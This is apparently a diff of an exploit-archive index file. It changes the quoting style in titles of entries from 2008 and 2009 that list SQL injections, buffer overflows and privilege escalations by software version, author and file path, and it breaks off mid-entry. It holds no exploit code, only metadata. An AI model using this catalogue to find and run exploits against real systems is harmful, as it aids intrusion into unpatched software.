6481,platforms/php/dos/6481.c,"Femitter FTP Server 1.03 - (RETR) Remote Denial of Service (PoC)",2008-09-17,LiquidWorm,php,dos,0 6482,platforms/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0 6483,platforms/php/webapps/6483.txt,"E-PHP CMS - 'article.php es_id' SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0 -6485,platforms/php/webapps/6485.txt,"addalink 4 - (category_id) SQL Injection",2008-09-18,ka0x,php,webapps,0 +6485,platforms/php/webapps/6485.txt,"addalink 4 - 'category_id' SQL Injection",2008-09-18,ka0x,php,webapps,0 6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - (random) SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 6487,platforms/php/webapps/6487.txt,"CYASK 3.x - (collect.php neturl) Local File Disclosure",2008-09-18,xy7,php,webapps,0 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php id' SQL Injection",2008-09-18,SarBoT511,php,webapps,0 @@ -6091,11 +6091,11 @@ id,file,description,date,author,platform,type,port 6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,php,webapps,0 6509,platforms/cgi/webapps/6509.txt,"TWiki 4.2.2 - 'action' Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0 6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,php,webapps,0 -6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 +6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0 6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0 -6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0 +6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - 'vdlptokn.sys' Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 6518,platforms/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 @@ -6277,7 +6277,7 @@ id,file,description,date,author,platform,type,port 6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0 6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps,0 -6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - (campaignId) SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 +6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / RFD",2008-10-08,GoLd_M,php,webapps,0 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0 @@ -6305,7 +6305,7 @@ id,file,description,date,author,platform,type,port 6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' SQL Injection",2008-10-10,BeyazKurt,php,webapps,0 6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - (redirect.php) Privilege Escalation",2008-10-10,StAkeR,php,webapps,0 6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection",2008-10-11,H!tm@N,php,webapps,0 -6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - (xlacomments.asp) SQL Injection",2008-10-11,Hakxer,asp,webapps,0 +6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection",2008-10-11,Hakxer,asp,webapps,0 6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - (File Disclosure/Code Execution) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,php,webapps,0 @@ -6444,8 +6444,8 @@ id,file,description,date,author,platform,type,port 6869,platforms/php/webapps/6869.txt,"WebCards 1.3 - SQL Injection",2008-10-29,t0pP8uZz,php,webapps,0 6870,platforms/windows/remote/6870.html,"MW6 Aztec ActiveX - 'Aztec.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6871,platforms/windows/remote/6871.html,"MW6 Barcode ActiveX - 'Barcode.dll' Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 -6872,platforms/windows/remote/6872.html,"MW6 Datamatrix - ActiveX (Datamatrix.dll) Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 -6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX (MW6PDF417.dll) Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 +6872,platforms/windows/remote/6872.html,"MW6 Datamatrix - ActiveX 'Datamatrix.dll' Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 +6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX 'MW6PDF417.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6874,platforms/php/webapps/6874.txt,"Harlandscripts Pro Traffic One - 'mypage.php' SQL Injection",2008-10-29,"Beenu Arora",php,webapps,0 6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite",2008-10-29,"Marco Torti",windows,remote,0 6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre - (OfertaID) Cross-Site Scripting / SQL Injection",2008-10-29,d3b4g,php,webapps,0 @@ -6483,7 +6483,7 @@ id,file,description,date,author,platform,type,port 6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0 6910,platforms/php/webapps/6910.txt,"SFS EZ BIZ PRO - 'track.php id' SQL Injection",2008-10-31,"Hussin X",php,webapps,0 6911,platforms/php/webapps/6911.txt,"SFS EZ Affiliate - 'cat_id' SQL Injection",2008-10-31,d3b4g,php,webapps,0 -6912,platforms/php/webapps/6912.txt,"Article Publisher PRO 1.5 - (SQL Injection) Authentication Bypass",2008-10-31,Hakxer,php,webapps,0 +6912,platforms/php/webapps/6912.txt,"Article Publisher PRO 1.5 - (Authentication Bypass) SQL Injection",2008-10-31,Hakxer,php,webapps,0 6913,platforms/php/webapps/6913.txt,"SFS EZ Webring - (cat) SQL Injection",2008-10-31,d3b4g,php,webapps,0 6914,platforms/php/webapps/6914.txt,"SFS EZ Hot or Not - (phid) SQL Injection",2008-10-31,d3b4g,php,webapps,0 6915,platforms/php/webapps/6915.txt,"SFS EZ Software - 'id' SQL Injection",2008-10-31,x0r,php,webapps,0 @@ -6503,7 +6503,7 @@ id,file,description,date,author,platform,type,port 6929,platforms/php/webapps/6929.txt,"Article Publisher PRO 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - 'details.php id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6932,platforms/php/webapps/6932.txt,"AJ ARTICLE - (SQL Injection) Remote Authentication Bypass",2008-11-01,Hakxer,php,webapps,0 +6932,platforms/php/webapps/6932.txt,"AJ ARTICLE - (Authentication Bypass) SQL Injection",2008-11-01,Hakxer,php,webapps,0 6933,platforms/php/webapps/6933.pl,"Micro CMS 0.3.5 - Remote Add/Delete/Password Change Exploit",2008-11-01,StAkeR,php,webapps,0 6934,platforms/php/webapps/6934.txt,"Shahrood - 'ndetail.php id' Blind SQL Injection",2008-11-01,BazOka-HaCkEr,php,webapps,0 6935,platforms/php/webapps/6935.txt,"YourFreeWorld Downline Builder - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 @@ -6539,7 +6539,7 @@ id,file,description,date,author,platform,type,port 6966,platforms/php/webapps/6966.txt,"Acc PHP eMail 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 6967,platforms/php/webapps/6967.txt,"MatPo Link 1.2b - (view.php id) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6968,platforms/php/webapps/6968.txt,"Acc Autos 4.0 - Insecure Cookie Handling",2008-11-03,x0r,php,webapps,0 -6969,platforms/php/webapps/6969.txt,"Apoll 0.7b - (SQL Injection) Remote Authentication Bypass",2008-11-03,ZoRLu,php,webapps,0 +6969,platforms/php/webapps/6969.txt,"Apoll 0.7b - (Authentication Bypass) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-03,Hakxer,php,webapps,0 6972,platforms/php/webapps/6972.txt,"pppBlog 0.3.11 - (randompic.php) File Disclosure",2008-11-03,JosS,php,webapps,0 6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 - (index.php content) Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 @@ -6552,13 +6552,13 @@ id,file,description,date,author,platform,type,port 6980,platforms/php/webapps/6980.txt,"Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS - (nID) SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 6982,platforms/php/webapps/6982.txt,"CMS-School 2005 - 'showarticle.php' SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 -6983,platforms/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 - (SQL Injection) Authentication Bypass",2008-11-04,Hakxer,php,webapps,0 -6984,platforms/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 - (SQL Injection) Authentication Bypass",2008-11-04,Hakxer,php,webapps,0 +6983,platforms/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 - (Authentication Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 +6984,platforms/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 - (Authentication Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 6985,platforms/php/webapps/6985.txt,"WEBBDOMAIN Quiz 1.02 - (Authentication Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 -6986,platforms/php/webapps/6986.txt,"WEBBDOMAIN Webshop 1.02 - (SQL Injection) Authentication Bypass",2008-11-04,Hakxer,php,webapps,0 +6986,platforms/php/webapps/6986.txt,"WEBBDOMAIN Webshop 1.02 - (Authentication Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 6987,platforms/php/webapps/6987.txt,"Simple Document Management System 1.1.4 - SQL Injection Authentication Bypass",2008-11-04,Yuri,php,webapps,0 6988,platforms/php/webapps/6988.txt,"Tours Manager 1.0 - (cityview.php cityid) SQL Injection",2008-11-04,G4N0K,php,webapps,0 -6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - (SQL Injection) Authentication Bypass",2008-11-04,x0r,php,webapps,0 +6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - (Authentication Bypass) SQL Injection",2008-11-04,x0r,php,webapps,0 6990,platforms/php/webapps/6990.txt,"nicLOR Sito - includefile Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 6991,platforms/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Login Bypass",2008-11-04,StAkeR,php,webapps,0 6992,platforms/php/webapps/6992.txt,"wotw 5.0 - Local / Remote File Inclusion",2008-11-04,dun,php,webapps,0 @@ -6621,7 +6621,7 @@ id,file,description,date,author,platform,type,port 7051,platforms/windows/local/7051.pl,"VideoLAN VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow",2008-11-07,SkD,windows,local,0 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0 -7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - (AKEProtect.sys) Privilege Escalation",2008-11-07,"NT Internals",windows,local,0 +7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - 'AKEProtect.sys' Privilege Escalation",2008-11-07,"NT Internals",windows,local,0 7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Config Download",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal - Credentials Leak Sniffer (Metasploit)",2008-11-08,"Kevin Finisterre",windows,remote,0 7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,php,webapps,0 @@ -6841,13 +6841,13 @@ id,file,description,date,author,platform,type,port 7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Config File Disclosure",2008-11-29,ahmadbady,php,webapps,0 7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7288,platforms/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - (ProductID) Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 +7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Blind SQL Injection",2008-11-29,Stack,php,webapps,0 7291,platforms/php/webapps/7291.pl,"OpenForum 0.66 Beta - Remote Reset Admin Password Exploit",2008-11-29,"CWH Underground",php,webapps,0 7292,platforms/asp/webapps/7292.txt,"ASPThai.Net Forum 8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",asp,webapps,0 7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - (Authentication Bypass) SQL Injection",2008-11-29,Cyber-Zone,asp,webapps,0 7294,platforms/php/webapps/7294.pl,"Lito Lite CMS - 'cate.php cid' SQL Injection",2008-11-29,"CWH Underground",php,webapps,0 -7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - (QuizID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7296,platforms/windows/dos/7296.txt,"iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié ",windows,dos,0 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 @@ -6950,7 +6950,7 @@ id,file,description,date,author,platform,type,port 7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - (common-tpl-vars.php) Local File Inclusion / Remote File Inclusion",2008-12-09,CoBRa_21,php,webapps,0 7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-09,ahmadbady,php,webapps,0 7401,platforms/windows/dos/7401.txt,"Vinagre < 2.24.2 - show_error() Remote Format String (PoC)",2008-12-09,"Core Security",windows,dos,0 -7402,platforms/windows/remote/7402.html,"EasyMail ActiveX - (emmailstore.dll 6.5.0.3) Buffer Overflow",2008-12-09,e.wiZz!,windows,remote,0 +7402,platforms/windows/remote/7402.html,"EasyMail ActiveX - 'emmailstore.dll 6.5.0.3' Buffer Overflow",2008-12-09,e.wiZz!,windows,remote,0 7403,platforms/windows/remote/7403.txt,"Microsoft Internet Explorer - XML Parsing Remote Buffer Overflow",2008-12-10,"Guido Landi",windows,remote,0 7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0 7405,platforms/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",linux,dos,0 @@ -7063,7 +7063,7 @@ id,file,description,date,author,platform,type,port 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic - 'messages.php' SQL Injection",2008-12-18,boom3rang,php,webapps,0 7515,platforms/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 -7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - (epfw.sys) Privilege Escalation",2008-12-18,"NT Internals",windows,local,0 +7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Privilege Escalation",2008-12-18,"NT Internals",windows,local,0 7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' SQL Injection",2008-12-18,fuzion,php,webapps,0 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 7519,platforms/php/webapps/7519.txt,"MyPHPsite - 'index.php mod' Local File Inclusion",2008-12-18,Piker,php,webapps,0 @@ -7080,7 +7080,7 @@ id,file,description,date,author,platform,type,port 7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Blind SQL Injection",2008-12-21,katharsis,php,webapps,0 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0 7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - (Database Backup/File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 -7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - (pstrip.sys) Privilege Escalation",2008-12-21,"NT Internals",windows,local,0 +7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Privilege Escalation",2008-12-21,"NT Internals",windows,local,0 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 (Wireless ADSL Router) - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0 @@ -7103,7 +7103,7 @@ id,file,description,date,author,platform,type,port 7553,platforms/php/webapps/7553.sh,"Roundcube Webmail 0.2b - Remote Code Execution",2008-12-22,Hunger,php,webapps,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - (8010/tcp) Remote Denial of Service",2008-12-23,Sha0,multiple,dos,0 -7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 +7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 7557,platforms/php/webapps/7557.txt,"PHPmotion 2.1 - Cross-Site Request Forgery",2008-12-23,Ausome1,php,webapps,0 7558,platforms/php/webapps/7558.txt,"PHPLD 3.3 - (page.php name) Blind SQL Injection",2008-12-23,fuzion,php,webapps,0 7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 - (password_recovery.php) Blind SQL Injection",2008-12-23,s4avrd0w,php,webapps,0 @@ -7133,7 +7133,7 @@ id,file,description,date,author,platform,type,port 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer - XML Parsing Buffer Overflow",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser 11.0.1 - Remote Buffer Overflow (Windows Vista)",2008-12-28,SkD,windows,remote,0 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - '.wav' Remote Crash (PoC)",2008-12-28,"laurent gaffié ",windows,dos,0 -7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - (Authentication Bypass) SQL Injection",2008-12-28,bizzit,php,webapps,0 +7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - SQL Injection (Authentication Bypass)",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla! Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0 7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - '.bps' Local Stack Overflow (PoC)",2008-12-28,Stack,windows,dos,0 7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow (PoC)",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 @@ -7411,7 +7411,7 @@ id,file,description,date,author,platform,type,port 7866,platforms/php/webapps/7866.txt,"Simple Machines Forum 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0 7868,platforms/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 - Remote File Overwrite",2009-01-26,Houssamix,windows,remote,0 -7869,platforms/windows/dos/7869.html,"MW6 Barcode ActiveX - (Barcode.dll) Remote Heap Overflow (PoC)",2009-01-26,Houssamix,windows,dos,0 +7869,platforms/windows/dos/7869.html,"MW6 Barcode ActiveX - 'Barcode.dll' Remote Heap Overflow (PoC)",2009-01-26,Houssamix,windows,dos,0 7871,platforms/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 - Insecure Method File Creation",2009-01-26,Stack,windows,remote,0 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 @@ -7546,7 +7546,7 @@ id,file,description,date,author,platform,type,port 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0 -8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - (entry) SQL Injection",2009-02-09,BackDoor,php,webapps,0 +8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",hardware,dos,0 8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 @@ -7698,7 +7698,7 @@ id,file,description,date,author,platform,type,port 8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,windows,remote,0 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 -8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation",2009-03-09,"NT Internals",windows,local,0 +8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - 'mksmonen.sys' Privilege Escalation",2009-03-09,"NT Internals",windows,local,0 8176,platforms/windows/local/8176.py,"EO Video 1.36 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 8177,platforms/windows/local/8177.py,"RadASM 2.2.1.5 - '.rap' Local Stack Overflow",2009-03-09,zAx,windows,local,0 8178,platforms/windows/local/8178.pl,"Mediacoder 0.6.2.4275 - '.m3u' Universal Stack Overflow",2009-03-09,Stack,windows,local,0 @@ -7729,7 +7729,7 @@ id,file,description,date,author,platform,type,port 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos,0 8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio - ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0 8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 - 'index.php' Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0 -8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - (MrvBarCd.dll) Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0 +8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - 'MrvBarCd.dll' Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Authentication Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0 8211,platforms/windows/remote/8211.pl,"Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 @@ -7767,7 +7767,7 @@ id,file,description,date,author,platform,type,port 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 -8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 +8250,platforms/windows/local/8250.txt,"CloneCD/DVD 'ElbyCDIO.sys' < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,windows,local,0 8252,platforms/php/webapps/8252.txt,"Pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 - Remote Stack Buffer Overflow",2009-03-20,"fl0 fl0w",windows,remote,0 @@ -7867,7 +7867,7 @@ id,file,description,date,author,platform,type,port 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0 -8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - 